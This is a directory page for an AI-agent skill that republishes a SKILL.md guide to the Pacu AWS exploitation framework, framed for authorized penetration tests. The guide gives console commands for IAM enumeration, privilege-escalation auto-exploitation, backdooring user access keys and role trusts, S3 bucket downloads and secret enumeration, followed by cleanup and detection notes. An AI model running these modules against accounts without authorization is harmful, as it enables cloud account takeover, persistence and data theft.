Remediating With AWS Security Agent
aws/agent-toolkit-for-aws
Pull AWS Security Agent findings (penetration tests and code reviews) and drive remediation.
Runs the Pacu AWS exploitation framework end-to-end — session and credential setup, IAM enumeration, automated privilege-escalation scanning via iamprivescscan, and persistence/backdooring modules…
The automated check flagged lines worth reading first. See the safety section below.
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-aws-with-pacu -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills exploiting-aws-with-pacu --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/exploiting-aws-with-pacu .claude/skills/exploiting-aws-with-pacu && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "exploiting-aws-with-pacu" agent skill from https://github.com/mukul975/Anthropic-Cybersecurity-Skills/tree/main/skills/exploiting-aws-with-pacu into .claude/skills/exploiting-aws-with-pacu/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "exploiting-aws-with-pacu", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/mukul975/Anthropic-Cybersecurity-Skills/tree/main/skills/exploiting-aws-with-pacuType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-aws-with-pacu -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills exploiting-aws-with-pacu --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .agents/skills && cp -r skills-src/skills/exploiting-aws-with-pacu .agents/skills/exploiting-aws-with-pacu && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "exploiting-aws-with-pacu" agent skill from https://github.com/mukul975/Anthropic-Cybersecurity-Skills/tree/main/skills/exploiting-aws-with-pacu into .agents/skills/exploiting-aws-with-pacu/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "exploiting-aws-with-pacu", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-aws-with-pacu -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills exploiting-aws-with-pacu --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/skills/exploiting-aws-with-pacu .cursor/skills/exploiting-aws-with-pacu && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "exploiting-aws-with-pacu" agent skill from https://github.com/mukul975/Anthropic-Cybersecurity-Skills/tree/main/skills/exploiting-aws-with-pacu into .cursor/skills/exploiting-aws-with-pacu/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "exploiting-aws-with-pacu", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git --path skills/exploiting-aws-with-pacu--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-aws-with-pacu -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills exploiting-aws-with-pacu --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/skills/exploiting-aws-with-pacu .gemini/skills/exploiting-aws-with-pacu && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "exploiting-aws-with-pacu" agent skill from https://github.com/mukul975/Anthropic-Cybersecurity-Skills/tree/main/skills/exploiting-aws-with-pacu into .gemini/skills/exploiting-aws-with-pacu/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "exploiting-aws-with-pacu", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills exploiting-aws-with-pacuInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-aws-with-pacu -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .github/skills && cp -r skills-src/skills/exploiting-aws-with-pacu .github/skills/exploiting-aws-with-pacu && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "exploiting-aws-with-pacu" agent skill from https://github.com/mukul975/Anthropic-Cybersecurity-Skills/tree/main/skills/exploiting-aws-with-pacu into .github/skills/exploiting-aws-with-pacu/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "exploiting-aws-with-pacu", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-aws-with-pacu -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills exploiting-aws-with-pacu --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/skills/exploiting-aws-with-pacu .opencode/skills/exploiting-aws-with-pacu && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "exploiting-aws-with-pacu" agent skill from https://github.com/mukul975/Anthropic-Cybersecurity-Skills/tree/main/skills/exploiting-aws-with-pacu into .opencode/skills/exploiting-aws-with-pacu/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "exploiting-aws-with-pacu", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
exploiting-aws-with-pacuRuns the Pacu AWS exploitation framework end-to-end — session and credential setup, IAM enumeration, automated privilege-escalation scanning via iamprivescscan, and persistence/backdooring modules…
Exploiting AWS With Pacu is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Runs the Pacu AWS exploitation framework end-to-end — session and credential setup, IAM enumeration, automated privilege-escalation scanning via iamprivescscan, and persistence/backdooring modules like iambackdooruserskeys. Use for authorized AWS penetration tests or red-team engagements, assessing blast radius from a compromised IAM credential, or generating attacker telemetry for purple-team detection testing.
Its SKILL.md is about 2.6k tokens, which your agent loads only when the skill is triggered. The skill folder holds 6 other files, including scripts and reference files (for example `references/api-reference.md`, `references/standards.md` and `scripts/agent.py`).
It sits in Security, covering Red teaming and adversary simulation and Penetration testing. It works with Amazon Web Services. The repository describes itself as: 817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io…. The licence is Apache-2.0.
9 steps, taken from the step headings in SKILL.md.
Read from SKILL.md and the folder at commit 54a7988. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
Ships 1 file in scripts/ (Python), which the agent can run.
Shell commands in SKILL.md call:
awspython3pipxdockerFrom the folder's file list and the shell code blocks in SKILL.md.
Hosts in commands or code, which the agent is likely to contact:
github.comAlso links to:
rhinosecuritylabs.comdocs.aws.amazon.comFrom URLs in SKILL.md, links to its own repository left out.
Names no API keys, tokens, secrets or passwords.
From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Exploiting AWS With Pacu loads about 2.6k tokens when it runs, and up to ~3.6k if it reads all its reference files. Until then it costs about 112 tokens; SKILL.md has 884 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check found patterns that need a careful read before installing.
with `set_keys` or by importing from `~/.aws/credentials`), confirm the identity with `whoami`, then enumerate IAM and tAutomated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); the scripts in this folder are not scanned.
The full file from mukul975/Anthropic-Cybersecurity-Skills at commit 54a7988, republished under its Apache-2.0 licence (© mukul975). 884 words, ~2,607 tokens.
.claude/skills/exploiting-aws-with-pacu/SKILL.md (or your agent's skills folder). This skill also uses 4 other files; get the full folder from GitHub.Legal Notice: This skill is for authorized penetration testing and educational purposes only. Pacu performs active enumeration, privilege escalation, persistence, and backdooring against live AWS accounts. Run it ONLY against accounts you own or have explicit written authorization (scope/Rules of Engagement) to test. Many modules create durable changes (new IAM users, access keys, policies); track and remove everything. Unauthorized use is illegal under the CFAA and equivalent laws.
Pacu is the open-source AWS exploitation framework from Rhino Security Labs. It is the cloud-pentest analogue of Metasploit: a modular Python console that manages target sessions, enumerates an AWS account, identifies privilege-escalation paths, and executes persistence/backdooring/exfiltration modules — all backed by a local SQLite database that records every enumerated resource so modules can chain off one another's findings.
A Pacu engagement follows a consistent arc. You create a named session, load AWS keys (with set_keys or by importing from ~/.aws/credentials), confirm the identity with whoami, then enumerate IAM and the rest of the account. The flagship workflow is iam__enum_permissions followed by iam__privesc_scan, which checks the compromised principal against ~20 known AWS IAM privilege-escalation primitives (e.g. iam:CreatePolicyVersion, iam:AttachUserPolicy, iam:PassRole + lambda:CreateFunction, sts:AssumeRole) and can auto-exploit them. Persistence modules such as iam__backdoor_users_keys mint a second access key on an existing user, and iam__backdoor_assume_role adds a trust to a role so the attacker can assume it later.
This skill covers installing Pacu, session and credential management, IAM enumeration, automated privilege-escalation scanning and exploitation, persistence/backdooring, and data access — every command and module name verified against the Rhino Security Labs project. Source: github.com/RhinoSecurityLabs/pacu.
python3 -m pip install -U pip
python3 -m pip install -U pacu # then run: pacu
# or, preferred on Kali, with pipx:
pipx install git+https://github.com/RhinoSecurityLabs/pacu.git
# or Docker:
docker run -it rhinosecuritylabs/pacu:latestaws sts get-caller-identity)| ID | Name | Use in this skill |
|---|---|---|
| T1078.004 | Valid Accounts: Cloud Accounts | Pacu operates as a valid AWS principal and abuses its permissions |
| T1098.001 | Account Manipulation: Additional Cloud Credentials | iam__backdoor_users_keys mints a second access key |
| T1098.003 | Account Manipulation: Additional Cloud Roles | iam__backdoor_assume_role / privesc via role policy changes |
| T1580 | Cloud Infrastructure Discovery | ec2__enum, iam__enum_users_roles_policies_groups |
| T1530 | Data from Cloud Storage | s3__download_bucket retrieves S3 objects |
| T1552.005 | Unsecured Credentials: Cloud Instance Metadata API | EC2 IMDS credential abuse |
pacu
# In the Pacu console:
Pacu> set_keys
# key alias : engagement-target
# access key : AKIA...
# secret key : ...
# session tok: (optional)Pacu> whoami
Pacu> run aws sts get-caller-identity # or, outside Pacu: aws sts get-caller-identityPacu> run iam__enum_users_roles_policies_groups
Pacu> run iam__enum_permissions
Pacu> data IAM # review what was collected into the session DBiam__privesc_scan checks the principal against known AWS privesc primitives and lists viable methods.
Pacu> run iam__privesc_scan
# To attempt automated exploitation of a discovered method:
Pacu> run iam__privesc_scan --offline # analyze without making changesPacu> run iam__backdoor_users_keys --usernames target-user
# Add an assumable-role trust for long-term access:
Pacu> run iam__backdoor_assume_role --role-names target-role --user-arns arn:aws:iam::111122223333:user/attackerPacu> run ec2__enum
Pacu> run s3__download_bucket --names target-bucket
Pacu> data S3Pacu> run secrets__enumPacu supports one-shot module execution from the shell.
pacu --session engagement --module-name iam__enum_users_roles_policies_groups --exec
pacu --session engagement --module-name s3__download_bucket \
--module-args "--names target-bucket" --execPacu> data all > /dev/stdout # review collected data
# Manually remove every backdoor created (record ARNs/key IDs first):aws iam delete-access-key --user-name target-user --access-key-id AKIA_BACKDOOR
aws iam update-assume-role-policy --role-name target-role --policy-document file://original-trust.jsonSee scripts/agent.py to drive the enumerate->privesc flow non-interactively.
| Resource | Purpose | Link |
|---|---|---|
| Pacu GitHub | Source, modules, wiki | https://github.com/RhinoSecurityLabs/pacu |
| Pacu module list | Per-module documentation | https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details |
| Rhino AWS privesc research | The privesc primitives iam__privesc_scan checks | https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ |
| AWS IAM docs | Permission and policy reference | https://docs.aws.amazon.com/IAM/latest/UserGuide/ |
| CloudGoat | Vulnerable AWS lab to practice safely | https://github.com/RhinoSecurityLabs/cloudgoat |
Pacu modules are noisy and durable; an operator must plan for both detection and cleanup:
iam__enum_permissions and iam__enum_users_roles_policies_groups generate a large
burst of iam:List*/iam:Get* calls visible in CloudTrail and GuardDuty
(Discovery:IAMUser/AnomalousBehavior).iam__privesc_scan in non-offline mode can make state-changing calls
(iam:CreatePolicyVersion, iam:AttachUserPolicy); use --offline for analysis only.iam__backdoor_users_keys triggers iam:CreateAccessKey, and
iam__backdoor_assume_role triggers iam:UpdateAssumeRolePolicy — both are
high-signal persistence indicators that defenders alert on.| Finding | Remediation |
|---|---|
| Over-permissive IAM principal (privesc path) | Apply least privilege; scope iam:PassRole with conditions |
iam:CreatePolicyVersion / SetDefaultPolicyVersion allowed | Remove from non-admin roles |
| Long-lived access keys | Enforce key rotation; prefer roles / short-lived STS creds |
| No detection on key creation | Alert on CreateAccessKey / UpdateAssumeRolePolicy in CloudTrail |
| Module | Purpose |
|---|---|
iam__enum_users_roles_policies_groups | Enumerate all IAM principals and policies |
iam__enum_permissions | Resolve the current principal's effective permissions |
iam__privesc_scan | Identify (and optionally exploit) privesc paths |
iam__backdoor_users_keys | Create a backdoor access key on a user |
iam__backdoor_assume_role | Add an attacker-controlled trust to a role |
ec2__enum | Enumerate EC2 instances, volumes, snapshots |
s3__download_bucket | Download objects from an S3 bucket |
secrets__enum | Enumerate Secrets Manager / SSM parameters |
whoami / sts get-caller-identityiam__privesc_scan run and viable paths documented© mukul975, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
SKILL.md and 4 other files (scripts, references) in skills/exploiting-aws-with-pacu of mukul975/Anthropic-Cybersecurity-Skills.
Open the folder on GitHubat commit 54a7988
Exploiting AWS With Pacu next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| Exploiting AWS With Pacu this skillmukul975/Anthropic-Cybersecurity-Skills | 34k | — | ~2.6k | Automated safety check: Warn | Apache-2.0 | |
| Remediating With AWS Security Agentaws/agent-toolkit-for-aws | 2.8k | — | ~2.9k | Automated safety check: Pass | Apache-2.0 | |
| Cloud Defensetransilienceai/communitytools | 563 | — | ~476 | Automated safety check: Pass | MIT | |
| Investigating AWS Incidentstrilwu/secskills | 157 | — | ~4.8k | Automated safety check: Pass | MIT | |
| Rds Db2aws/agent-toolkit-for-aws | 2.8k | — | ~6.9k | Automated safety check: Pass | Apache-2.0 | |
| Ad Environment ConstraintsADScanPro/Claude-AD | 211 | — | ~2.9k | Automated safety check: Notes | MIT |
aws/agent-toolkit-for-aws
Pull AWS Security Agent findings (penetration tests and code reviews) and drive remediation.
transilienceai/communitytools
Detect and break the cloud post-compromise attack chain (AWS / Azure / GCP) — per-stage CloudTrail / Activity-Log / Audit-Log detection signals and the preventive controls that close each step.
trilwu/secskills
Investigate security incidents in Amazon Web Services -- reconstruct attacker activity from CloudTrail, VPC Flow Logs, and GuardDuty, anchor the investigation on the compromised principal (access…
aws/agent-toolkit-for-aws
Provisions, connects, migrates, and operates Amazon RDS for Db2.
ADScanPro/Claude-AD
Real-world Active Directory environment constraints that silently break attacks when ignored: NTLM disabled (Kerberos fallback), AES-only KDCs (RC4 blocked by GPO), LDAP signing and channel binding…
CommonHuman-Lab/nyxstrike
Cloud and container security auditing workflow using prowler, trivy, kube-hunter, and docker-bench for AWS, GCP, Azure, Kubernetes, and container images
mukul975/Anthropic-Cybersecurity-Skills
Weighs infrastructure, TTP, malware code and timing evidence with the Diamond Model and competing hypotheses to reach a confidence-rated attribution.
mukul975/Anthropic-Cybersecurity-Skills
Walks through reverse engineering Go-compiled malware in Ghidra: parsing buildinfo and pclntab, recovering stripped function names and extracting dependencies.
mukul975/Anthropic-Cybersecurity-Skills
Guides forensic analysis of Windows LNK shortcut files and Jump Lists with LECmd, JLECmd and manual parsing to show file access and program execution.
mukul975/Anthropic-Cybersecurity-Skills
Hunts Windows malware persistence with Sysinternals Autoruns, covering run keys, services, scheduled tasks and drivers, with baseline comparison.
mukul975/Anthropic-Cybersecurity-Skills
Guides a Windows forensic examination of the NTFS Master File Table to recover deleted-file evidence, build timelines and spot timestomping.
mukul975/Anthropic-Cybersecurity-Skills
Detects DNS tunneling, ICMP exfiltration and HTTP-based covert channels in packet captures and DNS logs when hunting for hidden command-and-control traffic.
Works with
Categories
Runs the Pacu AWS exploitation framework end-to-end — session and credential setup, IAM enumeration, automated privilege-escalation scanning via iamprivescscan, and persistence/backdooring modules…. Exploiting AWS With Pacu is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Runs the Pacu AWS exploitation framework end-to-end — session and credential setup, IAM enumeration, automated privilege-escalation scanning via iamprivescscan, and persistence/backdooring modules like iambackdooruserskeys.
Exploiting AWS With Pacu fits situations like: authorized AWS penetration tests; red-team engagements; assessing blast radius from a compromised IAM credential; generating attacker telemetry for purple-team detection testing.
Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-aws-with-pacu -a claude-code`. Or copy the skill folder (skills/exploiting-aws-with-pacu in mukul975/Anthropic-Cybersecurity-Skills) into .claude/skills/exploiting-aws-with-pacu in your project. Claude Code loads it when a task matches its description.
Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-aws-with-pacu -a codex`. Or copy the skill folder (skills/exploiting-aws-with-pacu in mukul975/Anthropic-Cybersecurity-Skills) into .agents/skills/exploiting-aws-with-pacu in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill exploiting-aws-with-pacu -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/exploiting-aws-with-pacu, .gemini/skills/exploiting-aws-with-pacu, .github/skills/exploiting-aws-with-pacu and .opencode/skills/exploiting-aws-with-pacu in your project.
Going by SKILL.md and its folder, Exploiting AWS With Pacu needs Python for the scripts in its folder and the command-line tools its instructions call (aws, python3, pipx and docker). Our summary lists: Python 3; Docker.
SKILL.md names 3 domains. In commands or code: github.com; the agent is likely to contact it when it follows the instructions. As links in the text: rhinosecuritylabs.com and docs.aws.amazon.com. This is read from the text; nothing was executed.
Our automated static check of SKILL.md flagged 1 warning(s): mentions a credentials file (ssh keys, cloud or package-manager tokens). Read the flagged lines before installing; the check is not a guarantee either way. The check reads SKILL.md only: the scripts in the folder are not scanned, so read them before running anything.
Exploiting AWS With Pacu is published under the Apache-2.0 licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.
About 2.6k tokens (SKILL.md is roughly 10k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 969 tokens, read only when the agent opens those files.
Skills that share tags, products or a category with Exploiting AWS With Pacu: Remediating With AWS Security Agent (aws/agent-toolkit-for-aws, 2.8k stars), Cloud Defense (transilienceai/communitytools, 563 stars), Investigating AWS Incidents (trilwu/secskills, 157 stars) and Rds Db2 (aws/agent-toolkit-for-aws, 2.8k stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
mukul975 (a GitHub user) maintains it in mukul975/Anthropic-Cybersecurity-Skills, which has 34,116 GitHub stars. The repository holds 644 skills in this directory. The repository was last updated on August 31, 2026.
Source: mukul975/Anthropic-Cybersecurity-Skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.